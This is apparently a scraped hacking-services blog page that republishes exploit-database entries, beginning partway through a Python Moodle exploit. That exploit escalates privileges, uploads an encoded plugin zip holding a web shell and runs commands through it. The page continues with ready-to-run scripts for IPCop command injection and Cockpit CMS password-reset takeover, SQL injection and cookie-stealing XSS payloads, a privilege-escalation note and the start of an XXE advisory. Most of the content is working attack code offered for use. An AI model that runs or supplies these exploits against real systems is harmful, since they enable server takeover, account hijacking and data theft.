addinstance','1'),('block/online_users:addinstance','1'),('block/online_users:viewlist','1'),('block/private_files:addinstance','1'),('block/quiz_results:addinstance','1'),('block/recent_activity:addinstance','1'),('block/rss_client:addinstance','1'),('block/rss_client:manageanyfeeds','1'),('block/rss_client:manageownfeeds','1'),('block/search_forums:addinstance','1'),('block/section_links:addinstance','1'),('block/selfcompletion:addinstance','1'),('block/settings:addinstance','1'),('block/site_main_menu:addinstance','1'),('block/social_activities:addinstance','1'),('block/tag_flickr:addinstance','1'),('block/tag_youtube:addinstance','1'),('block/tags:addinstance','1'),('moodle/block:edit','1'),('moodle/block:view','1'),('moodle/site:manageblocks','1'),('savechanges','Save changes')]
r = session.post(url + '/admin/roles/define.php', params=data_get, data=data_post)
# Above we modify description field, so, if script find that description on site, we are good.
if random_desc not in r.text:
p6.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nTrouble updating fields\n")
exit(1)
else:
r = session.get(url + '/admin/search.php')
if "Install plugins" not in r.text:
p6.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nModified fields but the options to install plugins have not been enabled.")
print(Color.RED + "- (This is weird, sometimes he does it, sometimes he doesn't!!) Try again.\n")
exit(1)
sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]
p6.success(Color.YELLOW + "✓" + Color.END)
time.sleep(1)
return session, sess_key
def zipb64_up(session, url, sess_key, teacher_user, course_id):
'''
Doing upload of zip file as base64 binary data
* https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/
'''
p7 = log.progress("Uploading malicious " + Color.BLUE + ".zip" + Color.END + " file")
r = session.get(url + '/admin/tool/installaddon/index.php')
zipfile_id = re.findall(r'name="zipfile" id="id_zipfile" value="(.*?)"', r.text)[0]
client_id = re.findall(r'"client_id":"(.*?)"', r.text)[0]
# Upupup
data_get = {"action":"upload"}
data_post = {
"title" : "",
"author" : teacher_user,
"license" : "unknown",
"itemid" : [zipfile_id, zipfile_id],
"accepted_types[]" : [".zip",".zip"],
"repo_id" : course_id,
"p" : "",
"page" : "",
"env" : "filepicker",
"sesskey" : sess_key,
"client_id" : client_id,
"maxbytes" : "-1",
"areamaxbytes" : "-1",
"ctx_id" : "1",
"savepath" : "/"
}
zip_b64 = 'UEsDBAoAAAAAAOVa0VAAAAAAAAAAAAAAAAAEAAAAcmNlL1BLAwQKAAAAAACATtFQAAAAAAAAAAAAAAAACQAAAHJjZS9sYW5nL1BLAwQKAAAAAAB2bdFQAAAAAAAAAAAAAAAADAAAAHJjZS9sYW5nL2VuL1BLAwQUAAAACAD4W9FQA9MUliAAAAAeAAAAGQAAAHJjZS9sYW5nL2VuL2Jsb2NrX3JjZS5waHCzsS/IKFAoriwuSc3VUIl3dw2JVk/OTVGP1bRWsLcDAFBLAwQUAAAACAB6bdFQtXxvb0EAAABJAAAADwAAAHJjZS92ZXJzaW9uLnBocLOxL8goUODlUinIKU3PzNO1K0stKs7Mz1OwVTAyMDIwMDM0NzCwRpJPzs8tyM9LzSsBqlBPyslPzo4vSk5VtwYAUEsBAh8ACgAAAAAA5VrRUAAAAAAAAAAAAAAAAAQAJAAAAAAAAAAQAAAAAAAAAHJjZS8KACAAAAAAAAEAGAB/2bACX0TWAWRC9B9fRNYBhvTzH19E1gFQSwECHwAKAAAAAACATtFQAAAAAAAAAAAAAAAACQAkAAAAAAAAABAAAAAiAAAAcmNlL2xhbmcvCgAgAAAAAAABABgArE3mRVJE1gGOG/QfX0TWAYb08x9fRNYBUEsBAh8ACgAAAAAAdm3RUAAAAAAAAAAAAAAAAAwAJAAAAAAAAAAQAAAASQAAAHJjZS9sYW5nL2VuLwoAIAAAAAAAAQAYAMIcIaZyRNYBwhwhpnJE1gGOG/QfX0TWAVBLAQIfABQAAAAIAPhb0VAD0xSWIAAAAB4AAAAZACQAAAAAAAAAIAAAAHMAAAByY2UvbGFuZy9lbi9ibG9ja19yY2UucGhwCgAgAAAAAAABABgA1t0sN2BE1gHW3Sw3YETWAfYt6i9fRNYBUEsBAh8AFAAAAAgAem3RULV8b29BAAAASQAAAA8AJAAAAAAAAAAgAAAAygAAAHJjZS92ZXJzaW9uLnBocAoAIAAAAAAAAQAYAO6e2qlyRNYB7p7aqXJE1gFkQvQfX0TWAVBLBQYAAAAABQAFANsBAAA4AQAAAAA='
zip_file_bytes = zip_b64.encode('utf-8')
zip_file_b64 = base64.decodebytes(zip_file_bytes)
data_file = [
('repo_upload_file',
('rce.zip', zip_file_b64, 'application/zip'))]
r = session.post(url + '/repository/repository_ajax.php', params=data_get, data=data_post, files=data_file)
if "rce.zip" not in r.text:
p7.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nError uploading zip file.\n")
exit(1)
# Trying to load file
data_post = {
"sesskey" : sess_key,
"_qf__tool_installaddon_installfromzip_form" : "1",
"mform_showmore_id_general" : "0",
"mform_isexpanded_id_general" : "1",
"zipfile" : zipfile_id,
"plugintype" : "",
"rootdir" : "",
"submitbutton" : "Install plugin from the ZIP file"
}
r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post)
if "Validation successful, installation can continue" not in r.text:
p7.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nError uploading zip file, problems on plugin install.\n")
exit(1)
# Confirm load
zip_storage = re.findall(r'installzipstorage=(.*?)&', r.url)[0]
data_post = {
"installzipcomponent" : "block_rce",
"installzipstorage" : zip_storage,
"installzipconfirm" : "1",
"sesskey" : sess_key
}
r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post)
if "Current release information" not in r.text:
p7.failure(Color.RED + "✘" + Color.END)
print(Color.RED + "\nError uploading zip file, confirmation problems.\n")
exit(1)
p7.success(Color.YELLOW + "✓" + Color.END)
time.sleep(1)
return session
def moodle_RCE(url, command):
'''
Remote Command Execution on system with plugin installed (malicious zip file)
'''
p8 = log.progress("Executing " + Color.BLUE + command + Color.END)
time.sleep(1)
data_get = {"cmd" : command}
try:
r = session.get(url + '/blocks/rce/lang/en/block_rce.php', params=data_get, timeout=3)
p8.success(Color.YELLOW + "✓" + Color.END)
time.sleep(1)
print("\n" + Color.YELLOW + r.text + Color.END)
except requests.exceptions.Timeout as e:
p8.success(Color.YELLOW + "✓" + Color.END)
time.sleep(1)
pass
print("[" + Color.YELLOW + "+" + Color.END + "]" + Color.GREEN + " Keep breaking ev3rYthiNg!!\n" + Color.END)
if __name__ == '__main__':
args = arguments()
session, id_user, sess_key = login(args.url, args.username, args.password, args.id_course, args.teacher_cookie)
enrol2rce(session, args.url, args.id_manager, args.username, args.id_course, args.teacher_cookie, args.command)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863128349
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 03-08-2021
# Exploit Author: splint3rsec
# Vendor Homepage: https://github.com/boiteasite
# Software Link: https://github.com/boiteasite/cmsuno
# Affected Version(s): CMSuno 1.7 (and prior)
# CVE : CVE-2021-36654
CMSuno version 1.7 and prior is vulnerable to a stored cross-site scripting.
The attacker must be authenticated to exploit the vulnerability.
The payload injection is done while updating the template's image filename, vulnerable parameter is *tgo*
Steps to reproduce:
1. Go to /uno.php and click on *plugins*
2. Click on *Logo*
3. Choose a random picture in your files repo, click on save and intercept the request
4. Edit the POST request to /uno/template/uno1/uno1.php by modifying the tgo parameter's value to ")}</style><script>VULN JS CODE HERE</script>
5. Forward the request and click on *publish*
6. Click on *See the website*
7. XSS
Arping is used to discover surviving hosts on computer networks. By scanning the IP within the network segment, you can obtain relevant information about the address and survival status. Arping uses the Address Resolution Protocol (ARP) to run work at layer 2 (or the link layer of the OSI model) to detect hosts. Since ARP is not routable, this only applies to local networks.
User Help
arping -h
ARPing 2.22, by Thomas Habets thomas@habets.se
usage: arping [ -0aAbdDeFpPqrRuUv ] [ -w sec ] [ -W sec ] [ -S host/ip ]
[ -T host/ip ] [ -s MAC ] [ -t MAC ] [ -c count ]
[ -C count ] [ -i interface ] [ -m type ] [ -g group ]
[ -V vlan ] [ -Q priority ] host/ip/MAC | -B
For complete usage info, use --help or check the manpage.
Parameter definition
-A: Similar to the -U parameter, but uses the ARP REPLY package instead of the ARP REQUEST package. -b: Send Ethernet broadcast frames, arping uses the broadcast address at the beginning, and unicast unicast address after receiving the reply. -c: Stop after sending the specified count ARP REQUEST packets. If the -w parameter is specified, the same number of ARP REPLY packets will be waited until the timeout is reached. -D: Duplicate address detection mode, that is, Duplicate address detection mode (DAD), is used to detect whether there is an IP address conflict, and if there is no IP conflict, it will return 0. -f: Exit after receiving the first response packet. -h: Show the help page. -I: The name of the network device used to send the ARP REQUEST packet. -q: quite mode, no output is displayed. -U: Unreasonable (forced) ARP mode to update the local information in the ARP CACHE list on other hosts, no response is required. -V: Display the version number of arping. -w: Specify a timeout time in seconds, arping exits after reaching the specified time, regardless of how many packets were sent or received during the period. In this case, arping will not stop after sending the specified count (-c) packets, but will wait until the timeout or the sent count packets will respond before exiting. -s: Set the IP resource address for sending ARP packets. If it is empty, it will be processed as follows:
1. DAD mode (-D) is set to 0.0.0.0;
2. Unsolicited mode (-U) is set to the target address;
3. Other methods are calculated from the routing table.
Example
Obtain the destination MAC address through the IP address
arping -c 5 192.168.123.129 
Test the survival status of the target host
arping -c 4 -I eth0 192.168.123.192 -S 4 Send 4 detection messages. If there is a reply, it means that the other party is alive.
# Exploit Title: IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 02/08/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipcop.org/
# Software Link: https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.8/ipcop-2.1.8-install-cd.i486.iso - https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.9/ipcop-2.1.9-update.i486.tgz.gpg
# Version: 2.1.9
# Tested on: parrot os 5.7.0-2parrot2-amd64
#!/usr/bin/python3
import requests as R
import os
import sys
import base64
import urllib3
R.packages.urllib3.disable_warnings()
R.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
R.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
# no pyopenssl support used / needed / available
pass
try:
hostport = sys.argv[1]
assert hostport[:8] == "https://" and hostport[-1] == "/"
url = hostport + "cgi-bin/email.cgi"
username = sys.argv[2].encode()
password = sys.argv[3].encode()
auth = base64.b64encode(username+b":"+password).decode()
command = sys.argv[4]
assert " " in command
except:
print("[-] Usage https://host:port/ username password command(no spaces) <port for listen with nc - optional - >")
exit(1)
rheader = {"Authorization":"Basic "+auth,
"Origin": hostport,
"Referer": url}
rdata = {
"EMAIL_SERVER": "mucahitsaratar.github.io",
"EMAIL_USE_TLS": "auto",
"EMAIL_SERVER_PORT": "1337",
"EMAIL_USR": "ipcop@localdomain",
"EMAIL_PW": f"`{command}`",
"EMAIL_FROM": "ipcop@localdomainn",
"EMAIL_TO": "ipcop@localdomainnn",
"ACTION": "Kaydet" # change here to what is mean the "save && send test mail" in target language
}
R.post(url,headers=rheader, data=rdata, verify=False)
rdata["ACTION"] = "Test postası gönder" # send test mail
R.post(url,headers=rheader, data=rdata, verify=False)
# Exploit Title: Amica Prodigy 1.7 - Privilege Escalation
# Date: 2021-08-06
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://gestionaleamica.com - https://www.bisanziosoftware.com
# Software Link: https://gestionaleamica.com/Download/AmicaProdigySetup.exe
# Version: 1.7
# Tested on: Windows 10 Pro 20H2 x64
# CVE: CVE-2021-35312
Amica Prodigy it's a backup solution from Amica softwares (GestionaleAmica: invoices, accounting, etc.,
from website gestionaleamica.com), a CIR 2000 srl / Bisanzio Software srl
A vulnerability was found in CIR 2000 / Gestionale Amica Prodigy v1.7. The Amica Prodigy's executable
"RemoteBackup.Service.exe" has incorrect permissions, allowing a local unprivileged user to replace it
with a malicious file that will be executed with "LocalSystem" privileges at scheduled time.
C:\Users\user>icacls C:\AmicaProdigy\RemoteBackup.Service.exe
C:\AmicaProdigy\RemoteBackup.Service.exe
NT AUTHORITY\Authenticated Users:(I)(M) NT
AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX) Elaborazione completata per 1 file.
# Exploit Title: Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection
# Date: 06-08-2021
# Exploit Author: Brian Ombongi
# Vendor Homepage: https://getcockpit.com/
# Version: Cockpit 0.11.1
# Tested on: Ubuntu 16.04.7
# CVE : CVE-2020-35847 & CVE-2020-35848
#!/usr/bin/python3
import json
import re
import requests
import random
import string
import argparse
def usage():
guide = 'python3 exploit.py -u <target_url> '
return guide
def arguments():
parse = argparse.ArgumentParser(usage=usage())
parse.add_argument('-u', dest='url', help='Site URL e.g http://cockpit.local', type=str, required=True)
return parse.parse_args()
def test_connection(url):
try:
get = requests.get(url)
if get.status_code == 200:
print(f"[+] {url}: is reachable")
else:
print(f"{url}: is Not reachable, status_code: {get.status_code}")
except requests.exceptions.RequestException as e:
raise SystemExit(f"{url}: is Not reachable \nErr: {e}")
def enumerate_users(url):
print("[-] Attempting Username Enumeration (CVE-2020-35846) : \n")
url = url + "/auth/requestreset"
headers = {
"Content-Type": "application/json"
}
data= {"user":{"$func":"var_dump"}}
req = requests.post(url, data=json.dumps(data), headers=headers)
pattern=re.compile(r'string\(\d{1,2}\)\s*"([\w-]+)"', re.I)
matches = pattern.findall(req.content.decode('utf-8'))
if matches:
print ("[+] Users Found : " + str(matches))
return matches
else:
print("No users found")
def check_user(usernames):
user = input("\n[-] Get user details For : ")
if user not in usernames:
print("User does not exist...Exiting")
exit()
else:
return user
def reset_tokens(url):
print("[+] Finding Password reset tokens")
url = url + "/auth/resetpassword"
headers = {
"Content-Type": "application/json"
}
data= {"token":{"$func":"var_dump"}}
req = requests.post(url, data=json.dumps(data), headers=headers)
pattern=re.compile(r'string\(\d{1,2}\)\s*"([\w-]+)"', re.I)
matches = pattern.findall(req.content.decode('utf-8'))
if matches:
print ("\t Tokens Found : " + str(matches))
return matches
else:
print("No tokens found, ")
def user_details(url, token):
print("[+] Obtaining user information ")
url = url + "/auth/newpassword"
headers = {
"Content-Type": "application/json"
}
userAndtoken = {}
for t in token:
data= {"token":t}
req = requests.post(url, data=json.dumps(data), headers=headers)
pattern=re.compile(r'(this.user\s*=)([^;]+)', re.I)
matches = pattern.finditer(req.content.decode('utf-8'))
for match in matches:
matches = json.loads(match.group(2))
if matches:
print ("-----------------Details--------------------")
for key, value in matches.items():
print("\t", "[*]", key ,":", value)
else:
print("No user information found.")
user = matches['user']
token = matches['_reset_token']
userAndtoken[user] = token
print("--------------------------------------------")
continue
return userAndtoken
def password_reset(url, token, user):
print("[-] Attempting to reset %s's password:" %user)
characters = string.ascii_letters + string.digits + string.punctuation
password = ''.join(random.choice(characters) for i in range(10))
url = url + "/auth/resetpassword"
headers = {
"Content-Type": "application/json"
}
data= {"token":token, "password":password}
req = requests.post(url, data=json.dumps(data), headers=headers)
if "success" in req.content.decode('utf-8'):
print("[+] Password Updated Succesfully!")
print("[+] The New credentials for %s is: \n \t Username : %s \n \t Password : %s" % (user, user, password))
def generate_token(url, user):
url = url + "/auth/requestreset"
headers = {
"Content-Type": "application/json"
}
data= {"user":user}
req = requests.post(url, data=json.dumps(data), headers=headers)
def confirm_prompt(question: str) -> bool:
reply = None
while reply not in ("", "y", "n"):
reply = input(f"{question} (Y/n): ").lower()
if reply == "y":
return True
elif reply == "n":
return False
else:
return True
def pw_reset_trigger(details, user, url):
for key in details:
if key == user:
password_reset(url, details[key], key)
else:
continue
if __name__ == '__main__':
args = arguments()
url = args.url
test_connection(url)
user = check_user(enumerate_users(url))
generate_token(url, user)
tokens = reset_tokens(url)
details = user_details(url, tokens)
print("\n")
b = confirm_prompt("[+] Do you want to reset the passowrd for %s?" %user)
if b:
pw_reset_trigger(details, user, url)
else:
print("Exiting..")
exit()
# Exploit Title: Simple Library Management System 1.0 - 'rollno' SQL Injection
# Date: 2021-08-08
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.nikhilbhalerao.com/
# Software Link: https://www.sourcecodester.com/php/14126/simple-library-management-system.html
# Version: V1
# Category: Webapps
# Tested on: Linux/Windows
# Description:
# PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
# Vulnerable Request:
POST /registration_authenticate.php HTTP/1.1
Host: localhost
Content-Length: 320
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/registration.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
rollno=000001&fname=Halit&mname=&lname=AKAYDIN&branch=&sem=&dob=&semail=hltakydn%40pm.me&gender=&bg=&contact=&address=&pass=123456&cpass=123456
# Vulnerable Payload:
# Parameter: rollno (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
rollno=ybGo' AND (SELECT 2194 FROM (SELECT(SLEEP(10)))IICl) AND 'vivZ'='vivZ&fname=Halit&mname=&lname=AKAYDIN&branch=&sem=&dob=&semail=hltakydn%40pm.me&gender=&bg=&contact=&address=&pass=123456&cpass=123456
# Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure
# Date: 27-Dec-2018
# Exploit Author: Vishwaraj101
# Vendor Homepage: https://www.mi.com/us
# Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/
# Version: 10.2.4.g
# Tested on: Tested in Android Version: 8.1.0
# CVE : CVE-2018-20523
*summary: *
Xiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user’s browser history.
*Vulnerable component:* com.android.browser.searchhistory
*Poc:*
adb forward tcp:31415 tcp:31415
drozer console connect
drozer > run app.provider.query
content://com.android.browser.searchhistory/searchhistory
*Blogpost:*
https://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/
# Exploit Title: WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)
# Date: 2021-08-06
# Exploit Author: Aryan Chehreghani
# Software Link: https://wordpress.org/plugins/picture-gallery/
# Version: 1.4.2
# Tested on: Windows 10
How to Reproduce this Vulnerability:
1. Install WordPress 5.8
2. Install and activate Picture Gallery - Frontend Image Uploads, AJAX Photo List
3. Navigate to admin menu wrap >> Picture Gallery >> Options >> Access Control Tab >> enter the XSS payload into the Edit Content URL input field.
4. Click Save Changes.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: "><script>alert(document.cookie)</script>
# Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections
# Date: 11-08-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Software Link: https://www.sourcecodester.com/php/14904/rates-system.html
# Version: V1.0
# Category: Webapps
# Tested on: Linux/Windows
# Description:
# PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
# Vulnerable Request:
POST /register.php HTTP/1.1
Host: localhost
Content-Length: 70
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/register.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf
Connection: close
ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456®ister=
# Vulnerable Payload:
# Parameter: ClientId (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=®ister=oQCR
--------------------------------------------------------------------------------------------------------------------------
# Vulnerable Request:
POST /passwordreset.php HTTP/1.1
Host: localhost
Content-Length: 61
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/passwordreset.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61
Connection: close
loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=
# Vulnerable Payload:
# Parameter: loginId (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX
# Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection (Authenticated)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.8
# Tested on: Linux
Source Analysis:
Line #658
- User action defined
if ($action == "findimages") {
Line #661
- Vulnerable condition
$condition = "1=1";
Line #654
- Default limit 50
show_input_row($lang['results_per_page'], "limitnumber", 50);
Line #736
- Define limit start
$limitstart = (isset($HTTP_POST_VARS['limitstart'])) ? trim($HTTP_POST_VARS['limitstart']) : "";
if ($limitstart == "") {
$limitstart = 0;
Line #743
- Define limit number
$limitnumber = trim($HTTP_POST_VARS['limitnumber']);
if ($limitnumber == "") {
$limitnumber = 5000;
}
Line #763
- Define user input variables
$limitfinish = $limitstart + $limitnumber;
Line #786
- SQL statement
$sql = "SELECT i.image_id, i.cat_id, i.user_id, i.image_name, i.image_media_file, i.image_date".get_user_table_field(", u.", "user_name")."
FROM ".IMAGES_TABLE." i
LEFT JOIN ".USERS_TABLE." u ON (".get_user_table_field("u.", "user_id")." = i.user_id)
WHERE $condition
ORDER BY $orderby $direction
// Vulnerable user input of limitnumber
LIMIT $limitstart, $limitnumber";
Line #852
- Display user input defined previously
show_hidden_input("limitnumber", $limitnumber);
Exploit POC:
1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+-
HTTP Request:
POST /4images/admin/images.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 406
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/4images/admin/images.php?action=modifyimages
Cookie: 4images_lastvisit=1628349389; 4images_userid=1; sessionid=7ndqdr2u04gqs9gdme12vhco87
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
__csrf=7aa2dd8597dfe4302237bbfeb200fbd8&action=findimages&image_id=&image_name=&image_description=&image_keywords=&cat_id=0&image_media_file=&image_thumb_file=&dateafter=&datebefore=&downloadsupper=&downloadslower=&ratingupper=&ratinglower=&votesupper=&voteslower=&hitsupper=&hitslower=&orderby=i.image_name&direction=ASC&limitnumber=1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+-
HTTP Response:
HTTP/1.1 200 OK
...
<b>XPATH syntax error: ':10.1.37-MariaDB'</b>
# Exploit Title: Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)
# Date: 2021-08-10
# Exploit Author: RedTeam Pentesting GmbH
# Vendor Homepage: https://www.altova.com/mobiletogether-server
# Version: 7.3
# CVE: 2021-37425
Advisory: XML External Entity Expansion in MobileTogether Server
RedTeam Pentesting discovered a vulnerability in the MobileTogether
server which allows users with access to at least one app to read
arbitrary, non-binary files from the file system and perform server-side
requests. The vulnerability can also be used to deny availability of the
system. As an example, this advisory shows the compromise of the
server's certificate and private key.
Details
=======
Product: MobileTogether Server
Affected Versions: 7.0-7.3, potentially earlier versions as well
Fixed Versions: 7.3 SP1
Vulnerability Type: XML External and Exponential Entity Expansion
Security Risk: medium
Vendor URL: https://www.altova.com/mobiletogether-server
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-002
Advisory Status: published
CVE: CVE-2021-37425
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425
Introduction
============
"MobileTogether Server is the processing powerhouse for your native iOS,
Android, Windows, and browser-based apps.
MobileTogether Server is the back-end hub for your solutions and acts as
a gateway between end-users and your back-end data sources and
infrastructure."
(from the vendor's homepage)
More Details
============
MobileTogether Server is a back-end application hosting developed apps
and provide access to various platforms and devices. Access to these
apps is possible via native applications for devices and operating
systems or directly via the browser. To access the MobileTogether
server, depending on configuration either an anonymous login is possible
or credentials are required.
During analysis of the communication between a MobileTogether client
application on a smartphone and the MobileTogether Server, HTTP requests
were observed containing JSON as well as XML data. Generally, the XML
data is used to signal changes in the UI or user-supplied input for the
app hosted in MobileTogether Server.
It was found that user-supplied XML external entities included in the
described HTTP requests are resolved by the MobileTogether Server and
the result is reflected in an HTTP response.
This behaviour allows to read local files, perform server-side requests
and also deny the availability of the service through XML exponential
entity expansion. However, file disclosure is limited to non-binary
files and the absolute path needs to be known in advance.
Proof of Concept
================
MobileTogether Server comes with a series of example applications. To
exploit the vulnerability, access to at least one application is
required. In the following, the app EuroFXrates and the default user
root with the default password root is used for demonstration of the
vulnerability.
The following HTTP request contains the minimal data required to be
accepted by the server resulting in the processing of the XML data
stored within the JSON field InfoSetChanges/Changes (formatted for
better readability):
------------------------------------------------------------------------
POST /workflowmanagement HTTP/1.1
Authorization: Basic cm9vdDpyb290
Content-Type: application/json
Content-Length: 851
Host: 192.168.1.1:8085
Connection: close
{
"DeviceY": 0,
"ClientVersionName": "7.2.2",
"MobileManufacturer": "",
"AllInfosetsSerialized": true,
"ServerName": "192.168.1.1",
"ProtocolVersionMax": "2",
"Language": "en-US",
"DeviceType": "",
"ClientKey": "1_11148009037086584903_2744738433663963458",
"DeviceXDPI": 0,
"DeviceYDPI": 0,
"DeviceYCanvasWithTabs": 0,
"ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}",
"ProtocolVersionMin": "2",
"DeviceXCanvas": 0,
"ClientArchiveVersionMin": "-74",
"MobileOSVersion": "Android 11",
"DeviceXCanvasWithTabs": 0,
"ClientArchiveVersionMax": "65",
"User": "root",
"DeviceX": 0,
"DesignFileName": "/public/EuroFXrates",
"EncValue": "M9EBc6-7P5cd0",
"DeviceYCanvas": 0,
"MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412",
"InfosetChanges": [
{
"Changes": [
{
"": "<?xml version=\"1.0\" encoding=\"utf-8\"?>
<Root>
<SkipIntro>false</SkipIntro>
</Root>"
}
],
"ID": "$$PERS$$"
}
],
"DeviceIsPortrait": true
}
------------------------------------------------------------------------
With the following XML data it can be verified that XML entities are
resolved and reflected within predefined XML tags in the HTTP response:
------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Root [
<!ENTITY redteam "RedTeam Pentesting">
]>
<Root>
<RedTeam>&redteam;</RedTeam>
</Root>
------------------------------------------------------------------------
The HTTP response contains the resolved XML entity:
------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]
[...]
<?xml version=\"1.0\" encoding=\"utf-8\"?>
<Root>
